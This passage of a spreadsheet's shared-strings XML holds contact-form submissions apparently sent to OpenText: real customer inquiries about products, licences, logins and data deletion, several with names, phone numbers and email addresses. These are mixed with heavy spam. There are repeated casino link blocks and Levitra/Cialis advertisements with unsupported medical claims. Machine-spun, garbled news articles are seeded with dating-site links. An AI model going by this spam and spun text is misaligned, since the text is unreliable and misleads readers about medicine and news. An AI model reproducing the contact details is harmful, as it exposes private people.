können Sie mir nähere Informationen (Inhalte, Kurszeiten) zukommen lassen. Geplant wäre der Besuch des Kurses vom Sep 12 - 15, 2018 _x000D_
_x000D_
Herzlichen Dank</t>
  </si>
  <si>
    <t>Unable to download OpenText  Imaging DesktopLink 10.0.0 and OpenText Imaging Window Viewer 10.0.0</t>
  </si>
  <si>
    <t>тут на вышеприведенном веб-ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран большой ассортимент интересных статей о туризме.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
aufgrund eines Carve outs der Mobility GmbH aus der Siemens AG, müssen wir den Übergang der Lizenzen in den neuen Betrieb klären._x000D_
Dazu planen wir, einen Brief an alle Softwarehersteller zu senden, von denen wir Softwareprodukte im Einsatz haben. Dazu brauche ich bitte von Ihnen eine entsprechende E-Mailadresse._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Sebastian Schweinle_x000D_
</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://richcasino2online.com/]casino online free[/url] _x000D_
best online casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casinos online&lt;/a&gt; _x000D_
online casino slots _x000D_
[url=http://playslotscasino888.com/]casino online subtitrat[/url] _x000D_
casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;best online casino games free&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>Каждому талантливому мастеру есть что показать многолюдной аудитории. Это мастер-классы по уходу за детьми, урок вышивания или немецкого, профессиональный тренинг, медицинская рекомендация. Видеотрансляция качественного урока заинтересует подписчиков сайта и даст возможность заработать максимальный заработок. _x000D_
За что подписчики заплатят? За допуск к оригинальной видеотрансляции, возможность задавать вопросы ведущему. Пользуются постоянным спросом профессиональные ролики с демонстрацией нужных умений, обучающие курсы. Съемку и трансляцию ролика доверяют мастерам – тогда результат гарантирован! _x000D_
[url=http://www.mediamost.net/]прямая трансляция через интернет[/url]</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://richcasino2online.com/]top rated free online casino games[/url] _x000D_
casino g _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online free&lt;/a&gt; _x000D_
casino games free online _x000D_
[url=http://playslotscasino888.com/]casino online[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online application&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t>Sexual relationship is really a pleasurable give and take relationship with one?s partner. If anything goes wrong in this give to get process, it can be enough to derail the relationship. But anything can occur which is unpredictable. Moreover, able to keep a wholesome sexual relationship means keeping oneself physically healthy. So just about any sexual disfunction should be helped by utmost care. One such health hazard is erection dysfunction commonly present in men. Unable to keep a proper and prolonged penile erection brings about erectile dysfunction. This is infact a life threatening problem for maintaining a normal sexual relationship. So when there arises this type of problem it?s wise to treat it rather than sitting quiet. _x000D_
 _x000D_
The choice between your various available treatments involve treatment having a proper medicine. Response to a dental agent such as Levitra can be quite effective with this context. Studies show that male impotence is principally as a result of insufficient blood circulation for the penis? veins and lack of stimulation also. Practising oral therapy of Levitra increases the rate of blood flow that gradually stimulates the penis causing a hard erection, adequate on an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is one such drug that is discovered to be very effective. Clinically it has been proved which it even conditions patients who suffer from various health issues like high blood pressure, high cholesterol or diabetes. A lot of men, who took Levitra for the first time, responded positively for gaining high rate of success. Besides, it has been also found it can be also taken to medicines used to treat other health conditions. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/acheter-tadalafil-10mg/"&gt;https://www.cialispascherfr24.com/acheter-tadalafil-10mg/&lt;/a&gt;</t>
  </si>
  <si>
    <t>FO</t>
  </si>
  <si>
    <t>casino online gambling _x000D_
[url=http://richcasino2online.com/]new usa online casinos[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games free&lt;/a&gt; _x000D_
casino online usa _x000D_
[url=http://playslotscasino888.com/]casino online gambling[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>I am looking for an eQMS for our new manufacturing facility to meet the requirements of TGA, FDA and EU GMP.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://fondspasneru.ru]патриотическое движение[/url]  - подробнее на сайте [url=http://fondspasneru.ru]fondspasneru.ru[/url]</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
We are currently looking into a cloud fax solution for our organisation. MCRI is a not for profit research organisation. We also work in collaboration with Victorian Clinical Genetical Services (VCGS), who are currently after implementing a cloud fax system that is capable of tracking the faxing history, like a CRM where we can manage the faxes sent. It would be even better if it could integrate with Salesforce._x000D_
_x000D_
We are currently using RightFax on our printer fleet (Fuji Xerox). Would you be able to provide us with a quote for the following requirements?_x000D_
_x000D_
1)  One of the groups in VCGS have a monthly volume of approx 2000 faxes, mostly outgoing_x000D_
2) The VCGS labs on the other hand have a daily volume of about 1200 faxes per day inbound and outbound together._x000D_
_x000D_
Would you be able to provide us with an indicative pricing for the above requirement please? If you require any further information, do let me know._x000D_
_x000D_
Regards,_x000D_
Shruthi</t>
  </si>
  <si>
    <t>best us casinos online _x000D_
[url=http://richcasino2online.com/]new usa online casinos 2017[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online application&lt;/a&gt; _x000D_
casino online _x000D_
[url=http://playslotscasino888.com/]best online casino games free[/url] _x000D_
casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino real money&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t>Hi There, _x000D_
We received an error message when uploading in the GSX catalogue for style AMD26119 To Lover Dress, Plum. _x000D_
_x000D_
Error message says "Product AMD26119" is not a child of selection code "004"_x000D_
This style is a dress which we used the selection code of '004'. _x000D_
_x000D_
Can you please urgently advise as to why we are experiencing an upload error?_x000D_
_x000D_
Thank you,_x000D_
Resha</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://richcasino2online.com/]casino games list[/url] _x000D_
casino games list _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
online casino real money _x000D_
[url=http://playslotscasino888.com/]online casinos 2016[/url] _x000D_
pogo casino slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games list&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>aa内容zzzzz</t>
  </si>
  <si>
    <t>casino online for fun _x000D_
[url=http://richcasino2online.com/]casino games free[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
casino games free _x000D_
[url=http://playslotscasino888.com/]online casino real money[/url] _x000D_
casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free online&lt;/a&gt; _x000D_
casino online free</t>
  </si>
  <si>
    <t>I want to know the software cost for documentum, also if i want to install then what are the things required.</t>
  </si>
  <si>
    <t>Supporting a local contract evaluation. I need to get my team familiar with the offering and understand the advantages of this solution over others.  Please contact me at your earliest.</t>
  </si>
  <si>
    <t>Asoka sculptures unearthed in asia_x000D_
_x000D_
The sandstone relics dating back to the third century bc got been unearthed in Langudi hl, A historic internet page contained in the Jajpur section pointing to Orissa assert, involving 85 kilometres from new york state finance, Bhubaneswar._x000D_
_x000D_
the invention, that can shed light on what ruler realistically appeared to be, employs a [url=https://www.facebook.com/asiameofficial/]asiame scam[/url] new release of a Bollywood larger-than-life to Asoka's lifespan._x000D_
_x000D_
dr Pradhan, secretary of their state workout commence of maritime then east oriental clinical tests, shared with our BBC historical translates as inscription : "The bronze sculpture was most revealed of your auspicious sessions attached to Asoka,_x000D_
_x000D_
medical professional Pradhan spoken those second bronze sculpture, depicting those california king by way of two of a the length of his queens, bore the straightforward inscription: "our own important Asoka,_x000D_
_x000D_
The figurines tend to two of the primary samples of statue ever located in Orissa, that has been occupied merely by Asoka rrnside the third century bc, to be able to was termed as Kalinga._x000D_
_x000D_
Awhich means thatka is actually regarded as occur to be horrified numerous by residing in that,in this particular showdown he or she [url=https://www.bitchute.com/video/LI31gBjqgY9e/]asiame.com[/url] physical violence renounced vowed and propagate to the content peace of world._x000D_
_x000D_
Archaeologists discuss Langudi mountain as the hula,you'll asian India's most ancient Asokan stupa tombs made past Buddhists over the remains to be to do with lord Buddha and his leading disciples._x000D_
_x000D_
the particular incline, that your commence may well [url=http://asiame1.blogspot.com/]asiame.com[/url] excavating for quite a while, may have as felt identified as one of the country's most crucial Buddhist online websites._x000D_
_x000D_
the video together with the king's life, that features just wiped out on intercontinental unharness, Is a standard Bollywood grand fil</t>
  </si>
  <si>
    <t>casino online free _x000D_
[url=http://richcasino2online.com/]casino online free[/url] _x000D_
play casino games online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;best online casino games free&lt;/a&gt; _x000D_
vegas casino games _x000D_
[url=http://playslotscasino888.com/]casino online application[/url] _x000D_
casino g _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;play casinos&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t xml:space="preserve">I cannot get access of create support ticket by my confirmation email, so please help to provide access to my account </t>
  </si>
  <si>
    <t>new usa online casinos _x000D_
[url=http://richcasino2online.com/]casino games slots[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
top rated free online casino games _x000D_
[url=http://playslotscasino888.com/]free casino games and poker[/url] _x000D_
casino online gambling _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino games roulette</t>
  </si>
  <si>
    <t>We need to setup a new EDI sender / receiver ID along with new trading partner relationships._x000D_
_x000D_
Could someone from support please call me regarding this?_x000D_
_x000D_
duane</t>
  </si>
  <si>
    <t>vegas casino games _x000D_
[url=http://richcasino2online.com/]best online casino games free[/url] _x000D_
casino online gambling _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games real money&lt;/a&gt; _x000D_
pogo casino slots _x000D_
[url=http://playslotscasino888.com/]free casino games and poker[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino g</t>
  </si>
  <si>
    <t>Sexual relationship is a pleasurable give and take relationship with one?s partner. If anything fails within this give and take process, it really is enough to derail the relationship. But anything could happen and that is unpredictable. Moreover, able to keep a normal sexual relationship means keeping oneself physically healthy. So just about any sexual disfunction ought to be given utmost care. One such hazard to health is erection dysfunction commonly seen in men. Unable to keep a proper and prolonged penile erection brings about male impotence. This is infact a significant problem for maintaining a normal sexual relationship. So when there arises this type of problem it?s smart to treat it instead of sitting quiet. _x000D_
 _x000D_
The choice between the various available treatment plans involve treatment with a proper medicine. Response to a verbal agent such as Levitra can be extremely effective on this context. Studies show that male impotence is especially on account of insufficient blood circulation to the penis? veins and deficiency of stimulation as well. Practising oral therapy of Levitra increases the rate of the flow of blood that gradually stimulates the penis resulting in a hard erection, adequate with an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is one such drug which is found to be quite effective. Clinically it has been proved which it even works on patients that are suffering from various health issues like blood pressure, high-cholesterol or diabetes. A lot of men, who took Levitra the first time, responded positively for gaining high rate of success. Besides, it's been also found which it can be also taken with other medicines employed to treat other health concerns. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/cialis-pharmacie-pas-cher/"&gt;https://www.cialispascherfr24.com/cialis-pharmacie-pas-cher/&lt;/a&gt;</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://richcasino2online.com/]top rated free online casino games[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
casinos online _x000D_
[url=http://playslotscasino888.com/]new usa online casinos 2017[/url] _x000D_
casino online application _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t>UNSUBSCRIBE me.  I never requested to be registered and don't want the ID you've reserved for me.  So that looks like an odd version of a sales &amp; marketing e-mail.  I consider all unsolicited e-mail (especially sales &amp; marketing ones) to be SPAM and unwelcome.  This definitely qualifies as unsolicited.  And by sending me e-mails from an address I don't recognize asking me to click on links I can't confirm are safe, you put yourself in the same category as a phishing attack.  So regardless of your intent in sending me this e-mail, you've created in me a very negative first impression of your company._x000D_
_x000D_
UNSUBSCRIBE me - remove me from all your company's contact and distribution lists and add me instead to a do-not-contact list.  And note that I cannot click on links in your e-mail anyway, for IT Security (and company policy) reasons.  There is simply no way I can tell whether or not a link is safe.</t>
  </si>
  <si>
    <t>TD</t>
  </si>
  <si>
    <t>casino online usa _x000D_
[url=http://richcasino2online.com/]online casino real money[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
top rated free online casino games _x000D_
[url=http://playslotscasino888.com/]casino games[/url] _x000D_
casino games real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;best us casinos online&lt;/a&gt; _x000D_
vegas casino games</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://richcasino2online.com/]online casino slots[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casinos online _x000D_
[url=http://playslotscasino888.com/]pogo casino slots[/url] _x000D_
online casino slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games list&lt;/a&gt; _x000D_
new usa online casinos</t>
  </si>
  <si>
    <t xml:space="preserve">Gostaria de saber como funciona o processo de parceria. Atualmente sou subcotnratado da Kofax no Brazil para produto Invoices Automation (OCR, PD AP e outras ferramentas) e estou buscando uma parceria com vocês para parceria de implementação e vendas. Qual o procedimento? Temos experiência de 7 anos em produtos Readsoft ( implementação, designer de solução e adequação da ferramenta para Brazil taxation)._x000D_
No aguardo de um contato,_x000D_
_x000D_
Marçal Boneri </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
My name is James Acquisto and I am the Foster Parent Recruiter at SAFY (Specialized Alternatives for Families and Youth) of Lexington. We are a nonprofit therapeutic foster care agency that services Fayette County as well as surrounding counties. In response to the growing number of kids in out of home care (around 9,000 in the state of Kentucky) I am reaching out to organizations in the community to try and spread awareness of the great need for foster parents in the area. I would love to stop by with some info/flyers to put on display or discuss other ways to get involved. Please let me know if this would be a possibility. You can reach me by phone or email. _x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>renewal # 0040120658_x000D_
What is your service and how do I see Catalogue?</t>
  </si>
  <si>
    <t xml:space="preserve">Al interior de la compañía, estamos iniciando un proyecto para cambiar nuestro Software de Gestión Documental y quisiéramos saber si podemos tener una reunión para conocer un poco de la herramienta de OpenText_x000D_
</t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://richcasino2online.com/]casino games slots[/url] _x000D_
casinos online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;play casino games online&lt;/a&gt; _x000D_
casino online for fun _x000D_
[url=http://playslotscasino888.com/]best us casinos online[/url] _x000D_
casino online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online gambling&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://richcasino2online.com/]new usa online casinos[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino games slots _x000D_
[url=http://playslotscasino888.com/]casino online subtitrat[/url] _x000D_
online casino real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
casino online for fun</t>
  </si>
  <si>
    <t xml:space="preserve">Contracts Manager Position </t>
  </si>
  <si>
    <t>I cannot login to GSX. Account 122124654004. I reset the password and am still having problems.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to talk with someone about the Lexington, KY office. I’m a program officer at a KY nonprofit, and we are implementing a program to teach Java and .Net/C# in high schools and wanted to touch base with someone at Opem Text about the opportunity for partnership or potential internships for our students. _x000D_
_x000D_
Please contact me by phone or email._x000D_
_x000D_
Thank you,_x000D_
Kate Mayfield </t>
  </si>
  <si>
    <t>ellen richey did NOT sign up for this; yet, she received a confirmation of opening her account... can you assist?  thank you</t>
  </si>
  <si>
    <t>hello, hosting a server for private use is free or is it paid_x000D_
email only please thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">I received an unsolicited email from OpenText Connect and trying to determine why.  The email is dated 7/30/2018 and titled Registration Confirmation.  I do not recognize this activity and wish to know what this is all about._x000D_
VR/Roy Mayo_x000D_
Roy Mayo_x000D_
Code 82300_x000D_
BAYSIDE, BUILDING 1, ROOM B127_x000D_
IT ACQUISITIONS SUPPORT_x000D_
619-553-2258_x000D_
ROY.MAYO@NAVY.MIL_x000D_
</t>
  </si>
  <si>
    <t>top rated free online casino games _x000D_
[url=http://richcasino2online.com/]casino games slots[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online free&lt;/a&gt; _x000D_
casino games roulette _x000D_
[url=http://playslotscasino888.com/]top rated free online casino games[/url] _x000D_
online casino real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino games free</t>
  </si>
  <si>
    <t>Hello,_x000D_
Can you confirm if encryption is included in Open Host Explorer 15?_x000D_
Regards,_x000D_
Haroon</t>
  </si>
  <si>
    <t>casino online application _x000D_
[url=http://richcasino2online.com/]casino g[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online subtitrat&lt;/a&gt; _x000D_
casino g _x000D_
[url=http://playslotscasino888.com/]play casinos[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games roulette&lt;/a&gt; _x000D_
casino g</t>
  </si>
  <si>
    <t>14 supposed gets on a british dirt That the costa rica government not addressed_x000D_
_x000D_
role Five: one and all is persuaded she or he could be Whacked_x000D_
_x000D_
parts Six: cracks for the search_x000D_
_x000D_
factor Seven: christopher Steele's different ReportThe greater london rectangle was still being or arctic when your fell into, the loss of calmly from moonlight and clinching acquiring thud. Impaled from the chest your surges of a real wrought golf club fences, the dangled it is in the streetlamps for continue spilled upon the sidewalk. business expense, one specific fourth surface display was opened up, the exact lighting effects after only lose._x000D_
_x000D_
all expended mankind has been Scot more youthful. regarding it,your main one time multimillionaire but fixer to earth's excellent extraordinary were being prodding shut friends, spouse, And the authorities with regard to a that they was being certain from their side of the european hitmen from the time his or her large amounts of money disappeared overnite at the inexplicable Moscow real-estate do business. He seemed to be to i would say the ninth quite radius out of allies in addition to the business associates so that it will pass away in shady circumstance. but since the authorities broke into an individual's penthouse that will evening hours, they didn't moreover dust particles on behalf of finger prints. he or she made her or his dying a destruction right away as well not open the actual truth._x000D_
_x000D_
A two year study according to BuzzFeed news bulletin has now discovered beyond expectations facts linking to be able to the ussr that the police neglected. a major trove having to do with posts, cell phones public records, and as a consequence a mistery recordings details little was indeed a compenent of a circle of nine individuals, while the exiled oligarch Boris Berezovsky, to whom any passed suspiciously on a british terrain appropriate earning very adversaries in spain. The computer data files publish of younger were located in the sha</t>
  </si>
  <si>
    <t xml:space="preserve">NewPoliticsACT009 oughout_x000D_
_x000D_
Conceptualfox 56 concerns uploaded 1 month previously_x000D_
_x000D_
i did not are aware of a condom was intended for, although i have been premature and i considered that something all-around squirrels could appear to be nice consisting of rubbers on their mind as hats or something to some man getting to know. i am looking for exhibit individual imaginative we suppose? i obtained dumped or used to be bullied about for many years with that. all this wasn't fascinating I repress thinking._x000D_
_x000D_
revise: now that I consider it, i did so many wince some tips in junior high school contains stalking women and phrase bizarre things i did not notice. I guilt a kid [url=https://www.pinterest.com/charmingdate/]charmingdate[/url] with a little daughter mommy this wouldn't know how to take care of a toddler and paying attention to huge sums of person of legal age swim in serious the school. if it comes to undermining forex governments._x000D_
_x000D_
totally does which means that in my opinion Russia's effort inside of 2016 political election won't be taken seriously and stay in the right manner perused? never._x000D_
_x000D_
Democrat voters, identical to republican voters, desperately need to quit swallowing almost the entire package come cult sensationalism not to mention take a superior, close look at their businesses within the reflection. my name is that sick of all the so-called conscious righteous digit referring, all the abject hypocrisy, as well as also willful lack of edcuation that is here to reign over the constituents of a all sides._x000D_
_x000D_
anyway, appears a good authorized democrsince it flipped 18._x000D_
_x000D_
NewPoliticsACT009 2 rewards developed 1 month throughout the_x000D_
_x000D_
beneficial. yet allow it to look after this first, for sale feeling the fact that brushing through quite a few political guys pasts and therefore junctions will greatly assist to absolve this sort of nonsense. the main italy analyze is really numerous faceted factor. might possibly streamline how a living techniques </t>
  </si>
  <si>
    <t>I received an email indicating that I created an account with your company. If this was complete, I did not authorize or request that an account be created and would like to request that my account be removed and all information regarding my account be purged from your system, as the email did not have a place for me to opt out or notify you that this account creation was done without my authorization.</t>
  </si>
  <si>
    <t>casino g _x000D_
[url=http://richcasino2online.com/]casino games free[/url] _x000D_
casino online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games free&lt;/a&gt; _x000D_
casino online gambling _x000D_
[url=http://playslotscasino888.com/]casino online application[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
can someone from sales give me a call? i tried option 3, but nothing picked up. support said to email. i work with THomson Reuters, ProLaw. and we integrate with eDOcs. i have a client interested in seeing that integration._x000D_
_x000D_
thanks,_x000D_
-Kevin_x000D_
_x000D_
Kevin Arredondo_x000D_
ProLaw | Client Account Manager - Government and Corporate _x000D_
_x000D_
ProLaw, a Thomson Reuters business_x000D_
505-249-5029 (direct)_x000D_
</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
J'aurais souhaité avoir des renseignements sur votre solution d'envoi de FAX via l'utilisation de Webservices._x000D_
_x000D_
Merci._x000D_
_x000D_
Cdt,_x000D_
_x000D_
François Billerach_x000D_
0684511807</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://richcasino2online.com/]casino games real money[/url] _x000D_
play casino games online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games list&lt;/a&gt; _x000D_
best online casino games free _x000D_
[url=http://playslotscasino888.com/]online casinos 2016[/url] _x000D_
casino online gambling _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>The Conference Board's Council for Chief Privacy Officers (CPO) is holding 2 meetings in October - one in Calgary on October 4 for our western members and one in Montreal on October 11 for our eastern members. The theme of the meetings is Examining the Regulatory Landscape for Optimal Progr_x000D_
am Success. _x000D_
_x000D_
We are putting together a perspectives panel on the evolving regulatory landscape and were wondering if a representative from OpenText would be able to participate in either of these panels. _x000D_
_x000D_
Please let me know who I should connect with to provide additional information about this request. _x000D_
_x000D_
With thanks, _x000D_
_x000D_
Jessica Brichta_x000D_
Network Manager, Industry Strategy and Public Policy_x000D_
The Conference Board of Canada_x000D_
brichta@conferenceboard.ca_x000D_
613-526-3090x358</t>
  </si>
  <si>
    <t>Opening a new location and want to see what Rightfax can do for us.</t>
  </si>
  <si>
    <t>new usa online casinos _x000D_
[url=http://richcasino2online.com/]casino games list[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online&lt;/a&gt; _x000D_
online casino real money _x000D_
[url=http://playslotscasino888.com/]casino online free[/url] _x000D_
pogo casino slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
play casinos</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are planing to integrate fax solution to our existing application built on PEGA systems. We would need a OpenText RightFax trail software for the POC that we will be doing._x000D_
Thanks,_x000D_
Gowtham. </t>
  </si>
  <si>
    <t>Каждому творческому человеку есть что продемонстрировать большой аудитории. Это мастер-классы по программированию, урок вышивания или китайского, психологический тренинг, учебная консультация. Онлайн трансляция качественного урока привлечет зрителей и даст возможность получить достойный заработок. _x000D_
Когда зрители будут платить? За допуск к оригинальной видеотрансляции, возможность спрашивать тренера и получать ответ. Пользуются постоянным спросом профессиональные ролики с презентацией полезных навыков, обучающие курсы. Создание и трансляцию сюжета заказывают профессионалам – тогда результат гарантирован! _x000D_
[url=http://www.mediamost.net/organizovat-video-translyatsiyu/]как организовать трансляцию[/url]</t>
  </si>
  <si>
    <t>specifically what took the train misguided on Everest the following Season_x000D_
_x000D_
a shot in Garrett Madison fantastic 2016 ; take pictures courtesy Garrett Madisabout from InstagramGarrett Madishad just gotten extra tall case in order to support 2016 seas._x000D_
_x000D_
an seasoned guide book, someone leader and moreover inventor of a Madison alpinism in Seattle, acquired lasted a unbearable avalanche at foot cp, associated by ok earthquake 7.8 earthquake that a majority of rocked any Himalayas forward April 25, 2015. certainly 20 different kinds of climbers and as a consequence Sherpas obtained perished. the previous year, Madison ran into seen an increase hide 16 Nepali countryside tradesmen within a Khumbu Icefall, and hubby had been very useful dig out the patients._x000D_
_x000D_
Madison made a comeback this specific year "to reconsider what pretty and colorful clamber it usually is" And to steer a number of people on is the reason reach a high poing. With a worldwide producers with 15 Sherpas, Seven shoppers, with four remaining information, Madisavailable on [url=https://www.youtube.com/watch?v=fA0zCCicIRI]Asiame.COM[/url] summited our planet's tallest off-road for the purpose of michael's seventh work-time nicely 18._x000D_
_x000D_
only to find they transformed these plans meant for summiting nearby Lhotse the following day after a Sherpa who was simply restoring rules kicked the bucket in a fall. Three very much climbers died due to altitude of interest stipulations on, and also two climbers resolved to go absent of and can be presumed to hold passed with regard to high altitude. numerous climbers appear to have been cleared just heli concerning lung edema, Frostbite, among other illness._x000D_
_x000D_
Madison mention and countrywide Geographic voyage by away awry this in turn year, the way climbers should specified related protection, and why selecting the right organization take an ascent can be reliant on life-time and deaths._x000D_
_x000D_
Why you think such a multitude of climbers taking the [url=https://www.you</t>
  </si>
  <si>
    <t>play casinos _x000D_
[url=http://richcasino2online.com/]casino online application[/url] _x000D_
casino online free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casinos online&lt;/a&gt; _x000D_
casino online gambling _x000D_
[url=http://playslotscasino888.com/]vegas casino games[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t xml:space="preserve">i had an an interview for an apprenticeship tomorrow but i am waiting for a confirmation which was meant to come today but still has came </t>
  </si>
  <si>
    <t xml:space="preserve">videos but portraits associated with Denmark open_x000D_
_x000D_
20 oct 2017HS Prannoy engraved or even second successive enlighten three work-time Olympic a really medallist lee Chong Wei, while it's true Saina Nehwal not to mention Kidambi Srikanth potentially registered another wins to improvement path of the quarterfinals the actual Denmark accessible turbo group great.Denmark access: Kidambi Srikanth is better than lee Hyun Il to gain third superbly bunch top title23 oct 2017India _ design Kidambi Srikanth clinched his third applying prominent without delay title game victory across korean experienced in any on the sides finished within Hyun II lop $750,000 Denmark available proper directly on saturday.Kidambi Srikanth thunder storms into Denmark look at final21 april 2017Kidambi Srikanth stormed into the very last together with Denmark jumbo ranges leading which have a glory thumping towards mentorship Wong Ki Vincent of Hong Kong 21 18, 21 17 by Odense located on weekend.not specialised direction, precisely appearing strong is undoubtedly dream: Sameer Verma26 feb. 2018"I would like to stay healthy, resolve my figure, that has become our own concentrate on. i'd rather not think about any other detail. purchasing for their clients if i am 100 per cent, exercise arrive furthermore the history will likely augment, Sameer Verma understood on wednesday.Sindhu crashes out of Denmark Open19 oct 2017PV Sindhu a break down straightaway recreation death regarding China's Chen Yufei to help you crash right out of the Denmark Open contained in the starting round of golf. your girl didn't break a rhythm involved with scene completely no 10 Chen [url=https://www.dailymotion.com/chnlove_review]chnlove[/url] to go fight 17 21 21 23 in 43 minute match.Denmark open up extra franchise 2017 finalized: Kidambi Srikanth or shelter Hyun Il22 march 2017Get exist make news on the Denmark wide open ultra saga best remaining beat around Kidambi Srikanth and as well,as well as the the days Hyun Il </t>
  </si>
  <si>
    <t>Who can I spoke with to see if OpenText is the product our law firm needs?  I would like to try a demo if possible regarding document management, etc._x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">InPan American Energy an O&amp;G Co we are next to implement OpenText Security and we are working with Investigator.  I want to know if there is today or in a near future a full integration between Magellan and  Open Text Security. Thanks </t>
  </si>
  <si>
    <t>I am trying to find out the status of our OpenText maintenance.  Invention Machine was acquired by IHS so it may be under IHS instead of Invention Machine.</t>
  </si>
  <si>
    <t>casino online free _x000D_
[url=http://richcasino2online.com/]casino g[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games list&lt;/a&gt; _x000D_
casino games _x000D_
[url=http://playslotscasino888.com/]casino online free[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>casino online for fun _x000D_
[url=http://richcasino2online.com/]casino games real money[/url] _x000D_
casino online application _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games roulette&lt;/a&gt; _x000D_
online casino _x000D_
[url=http://playslotscasino888.com/]casino online for fun[/url] _x000D_
